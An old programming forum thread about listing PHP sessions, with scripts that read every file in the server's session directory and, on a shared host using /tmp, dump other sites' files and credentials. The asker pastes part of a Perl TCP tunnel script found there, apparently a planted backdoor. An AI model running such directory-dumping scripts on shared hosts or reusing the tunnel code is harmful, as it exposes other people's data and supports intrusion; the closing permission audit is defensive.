Creating a list of all registered sessions

Posted on 2006-05-10
Medium Priority
Last Modified: 2008-03-10
Last night my 11-year-old son asked me if it's possible to create
a list of all registered sessions while I was reading a PHP
tutorial. I tried a "For each" loop, but had to give up
after receiving some errors.

I would appreciate it if somebody could show him (if possible) how to
create a list of all registered sessions.
Question by:MnInShdw
LVL 16

Accepted Solution

dr_dedo earned 2000 total points
ID: 16656612
try this

foreach ($_SESSION as $x)
echo $x;
LVL 40

Expert Comment

by:Richard Quadling
ID: 16657294
Dr_dedo, not just the variables for the current session, but all sessions.


PHP 5 code (required because I am using the SPL DirectoryIterator class).

foreach (new DirectoryIterator(session_save_path()) as $obj_Session) {
      // Only regular files hold session data; skip directories and dot entries.
      if ($obj_Session->isFile()) {
            $s_session_data = file_get_contents($obj_Session->getPathname());
            echo '<b>' . $obj_Session->getPathname() . '</b><br /><pre>' . var_export($s_session_data, True) . '</pre><br /><br />';
      }
}

Works for me!
LVL 40

Expert Comment

by:Richard Quadling
ID: 16657351
You will probably have problems if the sessions are locked against a site (in a multiple hosted server), so only sessions on your own site.

I've just run this on a friend's server and the number of perl backdoor scripts present was frightening!

LVL 16

Expert Comment

ID: 16657354
wow, niceeeeeeeeeee
LVL 40

Expert Comment

by:Richard Quadling
ID: 16657402
If your site is using the /tmp directory for the session files, then you will get a LOT of junk here too. So watch out when you run that script.

Author Comment

ID: 16657523
Thanks dr_dedo for your help.
I had forgotten to start the session in my script
and that was why it didn't work out.

And a million thanks to RQuadling for trying to help
but unfortunately ixwebhosting is still on php4 and
I received "Unknown function" when I tried to
test the sample code.

One more time thanks to all who helped.
LVL 40

Expert Comment

by:Richard Quadling
ID: 16657721
The answer provided by dr_dedo has nothing to do with listing all the registered sessions!!!

It only allows you to look at your OWN current session.

And if you said you were on PHP4, I'd have given an appropriate answer.

You also did not say what your errors were.

This is an equivalent PHP4 script.

$obj_Dir = dir(session_save_path());
while (False !== ($s_file = $obj_Dir->read())) {
      echo $s_file;
      // Skip the current and parent directory entries.
      if (!in_array($s_file, array('.', '..'))) {
            $s_session_data = file_get_contents(session_save_path() . "/$s_file");
            echo '<b>' . $s_file . '</b><br /><pre>' . var_export($s_session_data, True) . '</pre><br /><br />';
      }
}
$obj_Dir->close();

This will also work with PHP5, but the process is a lot easier in PHP5 with the SPL.

LVL 17

Expert Comment

ID: 16658078
Tell your 11 year old to keep into programming, it's a lot of fun =)

Author Comment

ID: 16664598
Hi RQuadling

First of all, my apologies for not mentioning the error contents.

I did a copy and paste of your code and heavens... I had a lot of things
in the result. The page content was over several thousand lines.
A lot of subs, functions and even other homepages were inserted in the result
but nothing about the session variables.
The first line starts with several errors:
Warning: file_get_contents(/tmp/lost+found): failed to open stream: Permission denied in /hsphere/local/home/mydomain/mydomain.com/test2.php on line 8

I have even a lot of subs and functions
use IO::Socket;
use POSIX;
$localport = $ARGV[0];
$host      = $ARGV[1];
$port      = $ARGV[2];
$DIR = undef;
$| = 1;
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
%o = (\'port\' => $localport,\'toport\' => $port,\'tohost\' => $host);
$ah = IO::Socket::INET->new(\'LocalPort\' => $localport,\'Reuse\' => 1,\'Listen\' => 10) || die "$!";
$SIG{\'CHLD\'} = \'IGNORE\';
$num = 0;
while (1) {
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\\n"; next; }
$pid = fork();
if (!defined($pid)) { print STDERR "$!\\n"; }
elsif ($pid == 0) { $ah->close(); Run(\\%o, $ch, $num); }
else { $ch->close(); }
sub Run {
my($o, $ch, $num) = @_;
my $th = IO::Socket::INET->new(\'PeerAddr\' => $o->{\'tohost\'},\'PeerPort\' => $o->{\'toport\'});
if (!$th) { exit 0; }
my $fh;
if ($o->{\'dir\'}) { $fh = Symbol::gensym(); open($fh, ">$o->{\'dir\'}/tunnel$num.log") or die "$!"; }
while ($ch || $th) {
my $rin = "";
vec($rin, fileno($ch), 1) = 1 if $ch;
vec($rin, fileno($th), 1) = 1 if $th;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout  &&  !$eout) {}
my $cbuffer = "";
my $tbuffer = "";
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
my $result = sysread($ch, $tbuffer, 1024);
if (!defined($result)) {
print STDERR "$!\\n";
exit 0;

and there's a lot of passwords and database information (obviously not mine)
the page never ends and the contents are adding, I had to hit stop and then Ctrl+Break.
I have even more than 20 other home pages embedded in the result.
this is one of them and is in the middle of the result

None of my registered sessions were in the result.
To me it doesn't appear to be the correct method of gathering the
registered sessions.

I appreciate your trying to help.
Million thanks

Author Comment

ID: 16664616
Hi BogoJoker
I told my son about your message, but his dad has a hard
time learning PHP at the age of 43.

Thank you for your input
LVL 40

Expert Comment

by:Richard Quadling
ID: 16665491
The session directory is quite often the /tmp folder on the server.

What you are seeing is ALL the content of the temp folder.

On my servers the session folder is NOT tmp. So I only see other people's sessions.
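
The exposure discussed in the comments above (session files kept in /tmp or in a directory other sites can read) can be checked from your own script. This is an added example, not code from any poster in this thread; PRIVATE_DIR and the two helper functions are hypothetical names, and it assumes PHP 7 or later with the default file-based session handler.

```php
<?php
// Added example (not from the thread). PRIVATE_DIR is a hypothetical path.
const PRIVATE_DIR = __DIR__ . '/../private_sessions';

// session.save_path may be "N;MODE;/path"; empty means the system temp dir.
function effective_save_dir(string $raw): string
{
    $parts = explode(';', $raw);
    $dir = trim(end($parts));
    return $dir === '' ? sys_get_temp_dir() : $dir;
}

// Return the reasons $dir is a poor place for session files on a shared host.
function audit_save_dir(string $dir): array
{
    if (!is_dir($dir)) {
        return ["$dir does not exist"];
    }
    $findings = [];
    $mode = fileperms($dir) & 07777;
    if ($mode & 0007) {
        $findings[] = sprintf('%s is open to other users (mode %04o)', $dir, $mode);
    }
    if (function_exists('posix_geteuid') && fileowner($dir) !== posix_geteuid()) {
        $findings[] = "$dir is not owned by the account running PHP";
    }
    if (realpath($dir) === realpath(sys_get_temp_dir())) {
        $findings[] = "$dir is the system temp directory, shared with unrelated files";
    }
    return $findings;
}

$findings = audit_save_dir(effective_save_dir((string) session_save_path()));
if ($findings) {
    // Move sessions to a directory only this account can enter.
    if (!is_dir(PRIVATE_DIR) && !mkdir(PRIVATE_DIR, 0700, true)) {
        exit('Could not create ' . PRIVATE_DIR . "\n");
    }
    chmod(PRIVATE_DIR, 0700);
    session_save_path(PRIVATE_DIR);
}
session_start(); // must run before any output so the cookie header can be sent

foreach ($findings as $finding) {
    echo "WARNING (default save path): $finding\n";
}
echo 'Sessions are now stored in ' . session_save_path() . "\n";
```

Where every site on the host runs PHP under the same system account, directory permissions alone do not separate tenants; that needs a per-site account or an open_basedir restriction set by the host.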



Question has a verified solution.
